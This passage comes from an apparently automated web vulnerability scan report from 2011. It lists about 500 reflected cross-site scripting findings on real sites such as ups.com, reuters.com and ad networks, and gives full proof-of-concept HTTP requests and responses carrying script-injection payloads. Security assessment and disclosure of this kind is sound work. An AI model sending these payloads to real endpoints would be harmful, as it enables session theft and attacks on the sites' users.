1.270. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [syndicationOutletId parameter]

1.271. http://uk.reuters.com/assets/commentsChild [articleId parameter]

1.272. http://uk.reuters.com/assets/commentsChild [channel parameter]

1.273. http://uk.reuters.com/assets/sharedModuleJS [callback parameter]

1.274. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

1.275. http://uk.reuters.com/assets/sharedModuleJS [sp parameter]

1.276. http://uk.reuters.com/tracker/guid [cb parameter]

1.277. http://web.adblade.com/imps.php [description_color parameter]

1.278. http://web.adblade.com/imps.php [img_pad parameter]

1.279. http://web.adblade.com/imps.php [title_color parameter]

1.280. http://widgets.digg.com/buttons/count [url parameter]

1.281. http://www.dianomioffers.co.uk/smartads.epl [id parameter]

1.282. http://www.legacy.com/legacies/2011/obituary-photo-gallery.aspx [photo parameter]

1.283. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [EXP parameter]

1.284. http://www.nola.com/cgi-bin/donotcount/formatp.cgi/dhtml/jspop/jspop.ata [NAME parameter]

1.285. http://www.ups.com/bussol [WT.svl parameter]

1.286. http://www.ups.com/bussol [actionID parameter]

1.287. http://www.ups.com/bussol [actionID parameter]

1.288. http://www.ups.com/bussol [contentID parameter]

1.289. http://www.ups.com/bussol [contentID parameter]

1.290. http://www.ups.com/bussol [loc parameter]

1.291. http://www.ups.com/bussol [loc parameter]

1.292. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.293. http://www.ups.com/bussol [name of an arbitrarily supplied request parameter]

1.294. http://www.ups.com/bussol [viewID parameter]

1.295. http://www.ups.com/bussol [viewID parameter]

1.296. http://www.ups.com/bussol/ [WT.svl parameter]

1.297. http://www.ups.com/bussol/ [loc parameter]

1.298. http://www.ups.com/bussol/ [loc parameter]

1.299. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.300. http://www.ups.com/bussol/ [name of an arbitrarily supplied request parameter]

1.301. http://www.ups.com/bussol/ [viewID parameter]

1.302. http://www.ups.com/bussol/ [viewID parameter]

1.303. http://www.ups.com/content/global/index.jsx [REST URL parameter 2]

1.304. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 2]

1.305. http://www.ups.com/content/us/en/about/index.html [REST URL parameter 3]

1.306. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 2]

1.307. http://www.ups.com/content/us/en/about/news/service_updates/20091007_batteries.html [REST URL parameter 3]

1.308. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 2]

1.309. http://www.ups.com/content/us/en/about/news/service_updates/20100120_on_call.html [REST URL parameter 3]

1.310. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 2]

1.311. http://www.ups.com/content/us/en/about/news/service_updates/20100624_fraud.html [REST URL parameter 3]

1.312. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 2]

1.313. http://www.ups.com/content/us/en/about/news/service_updates/20101102_investigation.html [REST URL parameter 3]

1.314. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 2]

1.315. http://www.ups.com/content/us/en/about/news/service_updates/20101102_toner.html [REST URL parameter 3]

1.316. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 2]

1.317. http://www.ups.com/content/us/en/about/news/service_updates/20101217_imp_cntrl.html [REST URL parameter 3]

1.318. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 2]

1.319. http://www.ups.com/content/us/en/about/news/service_updates/retail_requirement.html [REST URL parameter 3]

1.320. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 2]

1.321. http://www.ups.com/content/us/en/about/sites.html [REST URL parameter 3]

1.322. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 2]

1.323. http://www.ups.com/content/us/en/contact/index.html [REST URL parameter 3]

1.324. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 2]

1.325. http://www.ups.com/content/us/en/freight/air_freight.html [REST URL parameter 3]

1.326. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 2]

1.327. http://www.ups.com/content/us/en/freight/customsbrokerage.html [REST URL parameter 3]

1.328. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 2]

1.329. http://www.ups.com/content/us/en/freight/expedite.html [REST URL parameter 3]

1.330. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 2]

1.331. http://www.ups.com/content/us/en/freight/index.html [REST URL parameter 3]

1.332. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 2]

1.333. http://www.ups.com/content/us/en/freight/ocean_freight.html [REST URL parameter 3]

1.334. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 2]

1.335. http://www.ups.com/content/us/en/freight/road_freight.html [REST URL parameter 3]

1.336. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 2]

1.337. http://www.ups.com/content/us/en/index.jsx [REST URL parameter 3]

1.338. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 2]

1.339. http://www.ups.com/content/us/en/locations/alliances/index.html [REST URL parameter 3]

1.340. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 2]

1.341. http://www.ups.com/content/us/en/locations/aso/index.html [REST URL parameter 3]

1.342. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 2]

1.343. http://www.ups.com/content/us/en/locations/custcenters/index.html [REST URL parameter 3]

1.344. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 2]

1.345. http://www.ups.com/content/us/en/locations/dropboxes/index.html [REST URL parameter 3]

1.346. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 2]

1.347. http://www.ups.com/content/us/en/locations/store/index.html [REST URL parameter 3]

1.348. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 2]

1.349. http://www.ups.com/content/us/en/myups/billing/index.html [REST URL parameter 3]

1.350. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 2]

1.351. http://www.ups.com/content/us/en/myups/mgmt/index.html [REST URL parameter 3]

1.352. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 2]

1.353. http://www.ups.com/content/us/en/register/help/index.html [REST URL parameter 3]

1.354. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 2]

1.355. http://www.ups.com/content/us/en/register/reasons/index.html [REST URL parameter 3]

1.356. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 2]

1.357. http://www.ups.com/content/us/en/resources/index.html [REST URL parameter 3]

1.358. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 2]

1.359. http://www.ups.com/content/us/en/resources/pay/index.html [REST URL parameter 3]

1.360. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 2]

1.361. http://www.ups.com/content/us/en/resources/service/delivery_change.html [REST URL parameter 3]

1.362. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 2]

1.363. http://www.ups.com/content/us/en/resources/service/index.html [REST URL parameter 3]

1.364. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 2]

1.365. http://www.ups.com/content/us/en/resources/ship/fraud.html [REST URL parameter 3]

1.366. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 2]

1.367. http://www.ups.com/content/us/en/resources/ship/index.html [REST URL parameter 3]

1.368. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 2]

1.369. http://www.ups.com/content/us/en/resources/ship/terms/privacy.html [REST URL parameter 3]

1.370. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 2]

1.371. http://www.ups.com/content/us/en/resources/ship/terms/shipping/index.html [REST URL parameter 3]

1.372. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 2]

1.373. http://www.ups.com/content/us/en/resources/ship/terms/use.html [REST URL parameter 3]

1.374. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 2]

1.375. http://www.ups.com/content/us/en/resources/start/index.html [REST URL parameter 3]

1.376. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 2]

1.377. http://www.ups.com/content/us/en/resources/techsupport/index.html [REST URL parameter 3]

1.378. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 2]

1.379. http://www.ups.com/content/us/en/resources/track/index.html [REST URL parameter 3]

1.380. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 2]

1.381. http://www.ups.com/content/us/en/shipping/index.html [REST URL parameter 3]

1.382. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 2]

1.383. http://www.ups.com/content/us/en/shipping/time/service/index.html [REST URL parameter 3]

1.384. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 2]

1.385. http://www.ups.com/content/us/en/shipping/time/service/shipping/index.html [REST URL parameter 3]

1.386. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 2]

1.387. http://www.ups.com/content/us/en/siteguide/index.html [REST URL parameter 3]

1.388. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 2]

1.389. http://www.ups.com/content/us/en/tracking/fgv/index.html [REST URL parameter 3]

1.390. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 2]

1.391. http://www.ups.com/content/us/en/tracking/quantumview/index.html [REST URL parameter 3]

1.392. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 2]

1.393. http://www.ups.com/content/us/en/tracking/tools/index.html [REST URL parameter 3]

1.394. http://www.ups.com/dropoff [WT.svl parameter]

1.395. http://www.ups.com/dropoff [loc parameter]

1.396. http://www.ups.com/dropoff [name of an arbitrarily supplied request parameter]

1.397. https://www.ups.com/account/am/start [REST URL parameter 2]

1.398. https://www.ups.com/account/am/start [REST URL parameter 2]

1.399. https://www.ups.com/account/am/start [REST URL parameter 2]

1.400. https://www.ups.com/account/am/start [REST URL parameter 3]

1.401. https://www.ups.com/account/am/start [REST URL parameter 3]

1.402. https://www.ups.com/account/am/start [REST URL parameter 3]

1.403. https://www.ups.com/account/am/start [loc parameter]

1.404. https://www.ups.com/account/am/start [loc parameter]

1.405. https://www.ups.com/account/am/start [loc parameter]

1.406. https://www.ups.com/account/us/start [REST URL parameter 2]

1.407. https://www.ups.com/account/us/start [REST URL parameter 2]

1.408. https://www.ups.com/account/us/start [REST URL parameter 2]

1.409. https://www.ups.com/account/us/start [REST URL parameter 3]

1.410. https://www.ups.com/account/us/start [REST URL parameter 3]

1.411. https://www.ups.com/account/us/start [REST URL parameter 3]

1.412. https://www.ups.com/account/us/start [loc parameter]

1.413. https://www.ups.com/account/us/start [loc parameter]

1.414. https://www.ups.com/account/us/start [loc parameter]

1.415. https://www.ups.com/cva [REST URL parameter 1]

1.416. https://www.ups.com/cva [REST URL parameter 1]

1.417. https://www.ups.com/cva [REST URL parameter 1]

1.418. https://www.ups.com/cva [loc parameter]

1.419. https://www.ups.com/cva [loc parameter]

1.420. https://www.ups.com/cva [loc parameter]

1.421. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.422. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.423. https://www.ups.com/myWorkspace/home [REST URL parameter 2]

1.424. https://www.ups.com/myWorkspace/home [loc parameter]

1.425. https://www.ups.com/myWorkspace/home [loc parameter]

1.426. https://www.ups.com/myWorkspace/home [loc parameter]

1.427. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.428. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.429. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2]

1.430. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.431. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.432. https://www.ups.com/myWorkspace/wspref [loc parameter]

1.433. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.434. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.435. https://www.ups.com/myups/addresses [REST URL parameter 2]

1.436. https://www.ups.com/myups/addresses [loc parameter]

1.437. https://www.ups.com/myups/addresses [loc parameter]

1.438. https://www.ups.com/myups/addresses [loc parameter]

1.439. https://www.ups.com/myups/forgotpassword [loc parameter]

1.440. https://www.ups.com/one-to-one/forgot [loc parameter]

1.441. https://www.ups.com/one-to-one/register [loc parameter]

1.442. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.443. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.444. https://www.ups.com/osa/orderSupplies [REST URL parameter 1]

1.445. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.446. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.447. https://www.ups.com/osa/orderSupplies [REST URL parameter 2]

1.448. https://www.ups.com/osa/orderSupplies [loc parameter]

1.449. https://www.ups.com/osa/orderSupplies [loc parameter]

1.450. https://www.ups.com/osa/orderSupplies [loc parameter]

1.451. https://www.ups.com/quantum_services/download [loc parameter]

1.452. https://www.ups.com/quantum_services/download [loc parameter]

1.453. https://www.ups.com/quantum_services/download [loc parameter]

1.454. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.455. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.456. https://www.ups.com/qvadmin/admin [REST URL parameter 1]

1.457. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.458. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.459. https://www.ups.com/qvadmin/admin [REST URL parameter 2]

1.460. https://www.ups.com/qvadmin/admin [loc parameter]

1.461. https://www.ups.com/qvadmin/admin [loc parameter]

1.462. https://www.ups.com/qvadmin/admin [loc parameter]

1.463. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.464. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.465. https://www.ups.com/sharp/prefapp [REST URL parameter 2]

1.466. https://www.ups.com/sharp/prefapp [loc parameter]

1.467. https://www.ups.com/sharp/prefapp [loc parameter]

1.468. https://www.ups.com/sharp/prefapp [loc parameter]

1.469. https://www.ups.com/uis/create [REST URL parameter 1]

1.470. https://www.ups.com/uis/create [REST URL parameter 1]

1.471. https://www.ups.com/uis/create [REST URL parameter 1]

1.472. https://www.ups.com/uis/create [REST URL parameter 2]

1.473. https://www.ups.com/uis/create [REST URL parameter 2]

1.474. https://www.ups.com/uis/create [REST URL parameter 2]

1.475. https://www.ups.com/uis/create [loc parameter]

1.476. https://www.ups.com/uis/create [loc parameter]

1.477. https://www.ups.com/uis/create [loc parameter]

1.478. http://www.webbyawards.com/webbys/current_honorees.php [media_id parameter]

1.479. http://www.webbyawards.com/webbys/current_honorees.php [season parameter]

1.480. http://www.wikia.com/index.php [actionName parameter]

1.481. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.482. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [Referer HTTP header]

1.483. http://trk.vindicosuite.com/Tracking/V2/BannerCreative/Impression/ [User-Agent HTTP header]

1.484. http://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

1.485. https://www.ups.com/homepage/ddhandler/handler.jsp [Referer HTTP header]

1.486. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.487. http://ar.voicefive.com/bmx3/broker.pli [ar_da39f516a098b3de) ar_p68511049 cookie]

1.488. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.489. http://ar.voicefive.com/bmx3/broker.pli [ar_p67161473 cookie]

1.490. http://ar.voicefive.com/bmx3/broker.pli [ar_p83612734 cookie]

1.491. http://ar.voicefive.com/bmx3/broker.pli [ar_p84053757 cookie]

1.492. http://ar.voicefive.com/bmx3/broker.pli [ar_p84068139 cookie]

1.493. http://ar.voicefive.com/bmx3/broker.pli [ar_p84532700 cookie]

1.494. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.495. http://ar.voicefive.com/bmx3/broker.pli [ar_p86183782 cookie]

1.496. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p84053757 cookie]

1.497. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [ZEDOIDA cookie]

1.498. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

1.499. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [ZEDOIDA cookie]

1.500. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js [ZEDOIDA cookie]

1.501. http://ib.adnxs.com/acb [acb816623 cookie]

1.502. http://k.collective-media.net/cmadj/cm.dailymail/ron_052010 [cli cookie]

1.503. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [V cookie]

1.504. http://tag.contextweb.com/TAGPUBLISH/getad.aspx [cwbh1 cookie]



1. Cross-site scripting (reflected)
There are 504 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.



1.1. http://a.collective-media.net/ad/cm.dailymail/ron_052010 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3b2a<script>alert(1)</script>2a020577f18 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;sz=300x250;ord=3461791? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; dc=dc; mmpg=1

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 113
Date: Mon, 14 Feb 2011 01:37:38 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ada3b2a<script>alert(1)</script>2a020577f18/cm.dailymail/ron_052010;cmw=nurl;sz=300x250;ord=3461791

1.2. http://a.collective-media.net/ad/cm.drudgerep/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /ad/cm.drudgerep/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 91f06<script>alert(1)</script>bbd480d1b59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;sz=300x250;click0=;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.drudgereport.com/
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; apnx=1; qcms=1; blue=1; qcdp=1; mmpg=1; dc=dc

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.65
Content-Type: text/html
Content-Length: 115
Date: Mon, 14 Feb 2011 02:10:23 GMT
Connection: close
Vary: Accept-Encoding

unknown path /ad91f06<script>alert(1)</script>bbd480d1b59/cm.drudgerep/;cmw=nurl;sz=300x250;click0=;ord=[timestamp]

1.3. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2dc11'-alert(1)-'c06cd63375f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail2dc11'-alert(1)-'c06cd63375f/ron_052010;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.4. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de2b'-alert(1)-'8f8feffd6d6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;ord=3412338? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 448
Date: Mon, 14 Feb 2011 01:35:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_0520106de2b'-alert(1)-'8f8feffd6d6;sz=300x250;net=cm;ord=3412338;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.5. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e360'-alert(1)-'b71794fc123 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?&9e360'-alert(1)-'b71794fc123=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; rdst4=1; rdst3=1; rdst7=1; rdst8=1; dp1=1; JY57=3j3C2c4UgMCi1w9hoE4sZ6cfql-2xzRl2eFEPSm8obK8tRi7bcg1RNg; targ=1; dp2=1; nadp=1; rdst11=1; rdst12=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Mon, 14 Feb 2011 01:35:24 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Wed, 16-Mar-2011 01:35:24 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.dailymail/ron_052010;sz=300x250;net=cm;ord=3412338?&9e360'-alert(1)-'b71794fc123=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

1.6. http://a.collective-media.net/adj/cm.dailymail/ron_052010 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.dailymail/ron_052010

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d7086'-alert(1)-'ae7eaada4f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/cm.dailymail/ron_052010;sz=300x250;ord=3412338?d7086'-alert(1)-'ae7eaada4f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.dailymail.co.uk/news/article-1356403/NHS-fertility-doctor-Charles-Kingsland-sends-UK-couples-Cyprus-illegal-treatment.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
